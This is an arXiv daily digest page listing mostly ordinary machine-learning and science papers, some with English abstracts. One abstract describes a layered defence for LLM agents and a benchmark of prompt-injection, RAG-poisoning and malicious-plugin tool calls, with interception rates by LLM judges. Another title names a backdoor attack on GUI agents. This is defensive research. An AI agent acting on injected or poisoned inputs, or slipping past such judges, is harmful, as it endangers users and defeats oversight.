arXivDaily每日学术速递，同步arXiv全量数据，AI总结、翻译，覆盖人工智能、机器人、计算机、金融、统计学、数学、物理学、生物学、经济学、电气&系统等方向。

2603.09296 2026-03-11 cs.IR cs.CL

Diagnosing and Repairing Citation Failures in Generative Engine Optimization

Zhihua Tian, Yuhan Chen, Yao Tang, Jian Liu, Ruoxi Jia

Comments 35 pages

详情

英文摘要

Generative Engine Optimization (GEO) aims to improve content visibility in AI-generated responses. However, existing methods measure contribution-how much a document influences a response-rather than citation, the mechanism that actually drives traffic back to creators. Also, these methods apply generic rewriting rules uniformly, failing to diagnose why individual document are not cited. This paper introduces a diagnostic approach to GEO that asks why a document fails to be cited and intervenes accordingly. We develop a unified framework comprising: (1) the first taxonomy of citation failure modes spanning different stages of a citation pipeline; (2) AgentGEO, an agentic system that diagnoses failures using this taxonomy, selects targeted repairs from a corresponding tool library, and iterates until citation is achieved; and (3) a document-centric benchmark evaluating whether optimizations generalize across held-out queries. AgentGEO achieves over 40% relative improvement in citation rates while modifying only 5% of content, compared to 25% for baselines. Our analysis reveals that generic optimization can harm long-tail content and some documents face challenges that optimization alone cannot fully address-findings with implications for equitable visibility in AI-mediated information access.

URL PDF HTML ☆

赞 0 踩 0

2603.09251 2026-03-11 stat.ML cs.LG cs.NA math.NA

A Generative Sampler for distributions with possible discrete parameter based on Reversibility

Lei Li, Zhen Wang, Lishuo Zhang

2603.09174 2026-03-11 eess.SY cs.AI cs.LG cs.SY

Differentiable Stochastic Traffic Dynamics: Physics-Informed Generative Modelling in Transportation

Wuping Xin

Comments 29 pages

2603.09162 2026-03-11 astro-ph.IM cs.CV eess.IV

POLISH'ing the Sky: Wide-Field and High-Dynamic Range Interferometric Image Reconstruction with Application to Strong Lens Discovery

Zihui Wu, Liam Connor, Samuel McCarty, Katherine L. Bouman

2603.08640 2026-03-11 cs.SE cs.AI cs.LG

PostTrainBench: Can LLM Agents Automate LLM Post-Training?

Ben Rank, Hardik Bhatnagar, Ameya Prabhu, Shira Eisenberg, Karina Nguyen, Matthias Bethge, Maksym Andriushchenko

2603.08316 2026-03-11 cs.CR cs.CL cs.CV

SlowBA: An efficiency backdoor attack towards VLM-based GUI agents

Junxian Li, Tu Lan, Haozhen Tan, Yan Meng, Haojin Zhu

Comments 25 pages

2603.08163 2026-03-11 cs.DC cs.LG

Covenant-72B: Pre-Training a 72B LLM with Trustless Peers Over-the-Internet

Joel Lidin, Amir Sarfi, Erfan Miahi, Quentin Anthony, Shivam Chauhan, Evangelos Pappas, Benjamin Thérien, Eugene Belilovsky, Samuel Dare

Comments 26 pages, 6 figures, 4 tables; minor update, no content changes

2603.07685 2026-03-11 cs.DC cs.CL cs.LG

Scalable Training of Mixture-of-Experts Models with Megatron Core

Zijie Yan, Hongxiao Bai, Xin Yao, Dennis Liu, Tong Liu, Hongbin Liu, Pingtian Li, Evan Wu, Shiqing Fan, Li Tao, Robin Zhang, Yuzhong Wang, Shifang Xu, Jack Chang, Xuwen Chen, Kunlun Li, Yan Bai, Gao Deng, Nan Zheng, Vijay Anand Korthikanti, Abhinav Khattar, Ethan He, Soham Govande, Sangkug Lym, Zhongbo Zhu, Qi Zhang, Haochen Yuan, Xiaowei Ren, Deyu Fu, Tailai Ma, Shunkang Zhang, Jiang Shao, Ray Wang, Vasudevan Rengasamy, Rachit Garg, Santosh Bhavani, Xipeng Li, Chandler Zhou, David Wu, Yingcan Wei, Ashwath Aithal, Michael Andersch, Mohammad Shoeybi, Jiajie Yao, June Yang

Comments Technical Report. 88 pages. 42 figures

2603.07191 2026-03-11 cs.CR cs.AI

Governance Architecture for Autonomous Agent Systems: Threats, Framework, and Engineering Practice

Yuxu Ge

Comments 22 pages, 2 figures, 10 tables

详情

英文摘要

Autonomous agents powered by large language models introduce a class of execution-layer vulnerabilities -- prompt injection, retrieval poisoning, and uncontrolled tool invocation -- that existing guardrails fail to address systematically. In this work, we propose the Layered Governance Architecture (LGA), a four-layer framework comprising execution sandboxing (L1), intent verification (L2), zero-trust inter-agent authorization (L3), and immutable audit logging (L4). To evaluate LGA, we construct a bilingual benchmark (Chinese original, English via machine translation) of 1,081 tool-call samples -- covering prompt injection, RAG poisoning, and malicious skill plugins -- and apply it to OpenClaw, a representative open-source agent framework. Experimental results on Layer 2 intent verification with four local LLM judges (Qwen3.5-4B, Llama-3.1-8B, Qwen3.5-9B, Qwen2.5-14B) and one cloud judge (GPT-4o-mini) show that all five LLM judges intercept 93.0-98.5% of TC1/TC2 malicious tool calls, while lightweight NLI baselines remain below 10%. TC3 (malicious skill plugins) proves harder at 75-94% IR among judges with meaningful precision-recall balance, motivating complementary enforcement at Layers 1 and 3. Qwen2.5-14B achieves the best local balance (98% IR, approximately 10-20% FPR); a two-stage cascade (Qwen3.5-9B->GPT-4o-mini) achieves 91.9-92.6% IR with 1.9-6.7% FPR; a fully local cascade (Qwen3.5-9B->Qwen2.5-14B) achieves 94.7-95.6% IR with 6.0-9.7% FPR for data-sovereign deployments. An end-to-end pipeline evaluation (n=100) demonstrates that all four layers operate in concert with 96% IR and a total P50 latency of approximately 980 ms, of which the non-judge layers contribute only approximately 18 ms. Generalization to the external InjecAgent benchmark yields 99-100% interception, confirming robustness beyond our synthetic data.

URL PDF HTML ☆

赞 0 踩 0

2603.06731 2026-03-11 cs.PL cs.LG

PolyBlocks: A Compiler Infrastructure for AI Chips and Programming Frameworks

Uday Bondhugula, Akshay Baviskar, Navdeep Katel, Vimal Patel, Anoop JS, Arnab Dutta

Comments Fixed the "Acknowledgments" section that was missing phrases

2603.02154 2026-03-11 cs.MA cs.AI

Boltzmann-based Exploration for Robust Decentralized Multi-Agent Planning (Extended Version)

Nhat D. A. Nguyen, Duong D. Nguyen, Gianluca Rizzo, Hung X. Nguyen

Comments To appear in ICAPS 2026

2603.02030 2026-03-11 eess.AS cs.LG

TCG CREST System Description for the DISPLACE-M Challenge

Nikhil Raghav, Md Sahidullah

Comments Report submitted for the DISPLACE-M challenge

2603.00945 2026-03-11 math.OC cs.LG stat.ML

Non-Rectangular Average-Reward Robust MDPs: Optimal Policies and Their Transient Values

Shengbo Wang, Nian Si

2602.15484 2026-03-11 eess.AS cs.LG eess.SP

Bottleneck Transformer-Based Approach for Improved Automatic STOI Score Prediction

Amartyaveer, Murali Kadambi, Chandra Mohan Sharma, Anupam Mondal, Prasanta Kumar Ghosh

Comments 7 pages, 7 tables, 2 figures, ASRU 2025

2602.12236 2026-03-11 cs.NE cs.AI cs.CV

Energy-Aware Spike Budgeting for Continual Learning in Spiking Neural Networks for Neuromorphic Vision

Anika Tabassum Meem, Muntasir Hossain Nadid, Md Zesun Ahmed Mia

2601.05355 2026-03-11 stat.ML cs.AI cs.LG stat.CO stat.ME

An AI-powered Bayesian Generative Modeling Approach for Arbitrary Conditional Inference

Qiao Liu, Wing Hung Wong

2512.13870 2026-03-11 eess.SP cs.LG cs.SY eess.SY

Do Spatial Descriptors Improve Multi-DoF Finger Movement Decoding from HD sEMG?

Ricardo Gonçalves Molinari, Leonardo Abdala Elias

Comments 14 pages, 12 figures, 1 table

2512.03636 2026-03-11 cs.HC cs.SD eess.AS

Head, posture, and full-body gestures in unscripted dyadic conversations in noise

Ľuboš Hládek, Bernhard U. Seeber

Comments 7 figures, 12 tables, 36 pages. MS heavily revised for clarity, discussion part extended. Annotation data for one participant was revised - some missing labels were added to the annotation

详情

英文摘要

Visual prosody may be critical for communication success in face-to-face conversations in noisy settings. Here, we explore the involvement of hand, head, and whole-body movements, as well as gesturing quality, in dyadic conversations in noisy settings. We hypothesize that increasing background noise would alter the frequency of conversation-related movements to support the roles of the speaker and the listener. Specifically, talkers may increase gesticulation and thus the use of hand, head, trunk, or leg movements more often, while listeners may increase backchanneling or head and trunk movements to improve the signal-to-noise ratio. Additionally, we test whether the synchrony between speech and hand gestures is affected by background noise. Here, pairs of normal hearing participants (n=8) stood in an audiovisual virtual environment while talking freely. The conversational movements were described using a newly developed labeling system with categories that respect their communicative function. The results showed higher gesturing rate during speaking than during listening. Increased levels of background noise led to increased hand-gesture complexity, modulation of head movements, and a change in trunk movements. People spoke 0.7 dB - 1.4 dB louder during hand gesturing in comparison to times with static drop posture but this was unrelated to presence of background noise. The analysis of hand-speech synchrony showed a modest decrease in synchrony for moderate noise level. People adapt their communicative behavior to increased background noise levels by increases in speech production levels and gesturing which may drive additional increase in speech production due to biomechanical coupling; listeners may increase backchanneling to support the exchange and their own signal-to-noise ratio. The synchrony analysis may reflect motivational factors of communication in noisy environments.

URL PDF HTML ☆

赞 0 踩 0

2512.00359 2026-03-11 physics.plasm-ph cs.LG

An Interpretable Operator-Learning Model for Electric Field Profile Reconstruction in Discharges Based on the EFISH Method

Zhijian Yang, Edwin Setiadi Sugeng, Mhedine Alicherif, Tat Loon Chng

详情

DOI: 10.1088/1361-6595/ae413f
Journal ref: Plasma Sources Sci. Technol. 35 025035 (2026)

英文摘要

Machine learning (ML) models have recently been used to reconstruct electric field distributions from EFISH signal profiles-the 'inverse EFISH problem'. This addresses the line-of-sight EFISH inaccuracy caused by the Gouy phase shift in focused beams. A key benefit of this approach is that the accuracy of the reconstructed profile can be directly checked via a 'forward transform' of the EFISH equation. Motivated by this latest success, the present study introduces a novel ML model with markedly improved performance. Based on a more powerful operator-learning architecture, it goes beyond the ANNs and CNNs employed previously. Termed Decoder-DeepONet (DDON), its main strength is learning function-to-function mappings, essential for recovering electric field profiles of unknown shape. The superior performance of DDON is exemplified via a comparison with our published CNN model and the feasibility of a classical mathematical method, as well as its application to both discharge simulations and experimental EFISH data from a nanosecond pulsed discharge. In almost all cases, the DDON model exhibits better generalizability, higher prediction accuracy, and wider applicability. Furthermore, the intrinsic nature of this operator-learning architecture renders it less sensitive to the exact location(s) of the acquired data, enabling electric field reconstruction even with seemingly 'incomplete' input profiles--an issue often accompanying poor signal sensitivity. We also employ Integrated Gradients (IG) to identify the signal regions most critical to reconstruction accuracy, providing guidance on the optimal sampling window for EFISH acquisition. Overall, we believe that the DDON model is a robust and comprehensive model which can be readily applied to reconstruct 'bell-shaped' electric field profiles with an existing axis of symmetry, especially in non-equilibrium plasmas.

URL PDF HTML ☆

赞 0 踩 0

2511.11687 2026-03-11 cs.CY cs.CL

Does Scientific Writing Converge to U.S. English? Evidence from Generative AI-Assisted Publications

Dragan Filimonovic, Christian Rutzer, Jeffrey Macher, Rolf Weder

2509.14093 2026-03-11 cs.SE cs.AI cs.CL

Reasoning Efficiently Through Adaptive Chain-of-Thought Compression: A Self-Optimizing Framework

Kerui Huang, Shuhan Liu, Xing Hu, Tongtong Xu, Lingfeng Bao, Xin Xia

2509.10166 2026-03-11 stat.ML cs.LG

Repulsive Monte Carlo on the sphere for the sliced Wasserstein distance

Vladimir Petrovic, Rémi Bardenet, Agnès Desolneux

详情

英文摘要

In this paper, we consider the problem of computing the integral of a function on the unit sphere, in any dimension, using Monte Carlo methods. Although the methods we present are general, our guiding thread is the sliced Wasserstein distance between two measures on $\mathbb{R}^d$, which is precisely an integral on the $d$-dimensional sphere. The sliced Wasserstein distance (SW) has gained momentum in machine learning either as a proxy to the less computationally tractable Wasserstein distance, or as a distance in its own right, due in particular to its built-in alleviation of the curse of dimensionality. There has been recent numerical benchmarks of quadratures for the sliced Wasserstein, and our viewpoint differs in that we concentrate on quadratures where the nodes are repulsive, i.e. negatively dependent. Indeed, negative dependence can bring variance reduction when the quadrature is adapted to the integration task. Our first contribution is to extract and motivate quadratures from the recent literature on determinantal point processes (DPPs) and repelled point processes, as well as repulsive quadratures from the literature specific to the sliced Wasserstein distance. We then numerically benchmark these quadratures. Moreover, we analyze the variance of the UnifOrtho estimator, an orthogonal Monte Carlo estimator. Our analysis sheds light on UnifOrtho's success for the estimation of the sliced Wasserstein in large dimensions, as well as counterexamples from the literature. Our final recommendation for the computation of the sliced Wasserstein distance is to use randomized quasi-Monte Carlo in low dimensions and UnifOrtho in large dimensions. DPP-based quadratures only shine when quasi-Monte Carlo also does, while repelled quadratures show moderate variance reduction in general, but more theoretical effort is needed to make them robust.

URL PDF HTML ☆

赞 0 踩 0

2508.09535 2026-03-11 cs.MM cs.AI cs.CL cs.DL

AI Blob! LLM-Driven Recontextualization of Italian Television Archives

Roberto Balestri

Comments Preprint

详情

DOI: 10.66062/PHBQ6517
Journal ref: 16th Media Mutations International Conference (pp. 123-133) 2026

英文摘要

This paper introduces AI Blob!, an experimental system designed to explore the potential of semantic cataloging and Large Language Models (LLMs) for the retrieval and recontextualization of archival television footage. Drawing methodological inspiration from Italian television programs such as Blob (RAI Tre, 1989-), AI Blob! integrates automatic speech recognition (ASR), semantic embeddings, and retrieval-augmented generation (RAG) to organize and reinterpret archival content. The system processes a curated dataset of 1,547 Italian television videos by transcribing audio, segmenting it into sentence-level units, and embedding these segments into a vector database for semantic querying. Upon user input of a thematic prompt, the LLM generates a range of linguistically and conceptually related queries, guiding the retrieval and recombination of audiovisual fragments. These fragments are algorithmically selected and structured into narrative sequences producing montages that emulate editorial practices of ironic juxtaposition and thematic coherence. By foregrounding dynamic, content-aware retrieval over static metadata schemas, AI Blob! demonstrates how semantic technologies can facilitate new approaches to archival engagement, enabling novel forms of automated narrative construction and cultural analysis. The project contributes to ongoing debates in media historiography and AI-driven archival research, offering both a conceptual framework and a publicly available dataset to support further interdisciplinary experimentation.

URL PDF HTML ☆

赞 0 踩 0

2508.08837 2026-03-11 cs.SI cs.AI

Debiasing International Attitudes: LLM Agents for Simulating US-China Perception Changes

Nicholas Sukiennik, Yichuan Xu, Yuqing Kan, Jinghua Piao, Yuwei Yan, Chen Gao, Yong Li

Comments Submitted to TCSS

2508.01555 2026-03-11 eess.IV cs.CV

MGCR-Net:Multimodal Graph-Conditioned Vision-Language Reconstruction Network for Remote Sensing Change Detection

Chengming Wang, Guodong Fan, Jinjiang Li, Min Gan, C. L. Philip Chen

详情

DOI: 10.1109/TGRS.2026.3654629
Journal ref: IEEE Transactions on Geoscience and Remote Sensing, vol. 64, pp. 1-15, 2026, Art no. 4701515

英文摘要

With the advancement of remote sensing satellite technology and the rapid progress of deep learning, remote sensing change detection (RSCD) has become a key technique for regional monitoring. Traditional change detection (CD) methods and deep learning-based approaches have made significant contributions to change analysis and detection, however, many outstanding methods still face limitations in the exploration and application of multimodal data. To address this, we propose the multimodal graph-conditioned vision-language reconstruction network (MGCR-Net) to further explore the semantic interaction capabilities of multimodal data. Multimodal large language models (MLLM) have attracted widespread attention for their outstanding performance in computer vision, particularly due to their powerful visual-language understanding and dialogic interaction capabilities. Specifically, we design a MLLM-based optimization strategy to generate multimodal textual data from the original CD images, which serve as textual input to MGCR. Visual and textual features are extracted through a dual encoder framework. For the first time in the RSCD task, we introduce a multimodal graph-conditioned vision-language reconstruction mechanism, which is integrated with graph attention to construct a semantic graph-conditioned reconstruction module (SGCM), this module generates vision-language (VL) tokens through graph-based conditions and enables cross-dimensional interaction between visual and textual features via multihead attention. The reconstructed VL features are then deeply fused using the language vision transformer (LViT), achieving fine-grained feature alignment and high-level semantic interaction. Experimental results on four public datasets demonstrate that MGCR achieves superior performance compared to mainstream CD methods. Our code is available on https://github.com/cn-xvkong/MGCR

URL PDF HTML ☆

赞 0 踩 0

2507.10179 2026-03-11 math.HO cs.AI

On the mechanical creation of mathematical concepts

Asvin G

Comments A complete rewrite of the paper

2506.23553 2026-03-11 eess.AS cs.SD

Human-CLAP: Human-perception-based contrastive language-audio pretraining

Taisei Takano, Yuki Okamoto, Yusuke Kanamori, Yuki Saito, Ryotaro Nagase, Hiroshi Saruwatari

Comments Submitted to APSIPA ASC 2025

2506.20533 2026-03-11 stat.ML cs.LG math.OC

Global Convergence of Iteratively Reweighted Least Squares for Robust Subspace Recovery

Gilad Lerman, Kang Li, Tyler Maunu, Teng Zhang

2506.12842 2026-03-11 cs.SI cs.LG stat.ML

Uncovering Social Network Activity Using Joint User and Topic Interaction

Gaspard Abel, Argyris Kalogeratos, Jean-Pierre Nadal, Julien Randon-Furling

Comments Content: 13 pages, 8 figures, 4 tables

2506.04265 2026-03-11 cs.MA cs.AI cs.GT cs.LG

Cooperative Game-Theoretic Credit Assignment for Multi-Agent Policy Gradients via the Core

Mengda Ji, Genjiu Xu, Keke Jia, Zekun Duan, Yong Qiu, Jianjun Ge, Mingqiang Li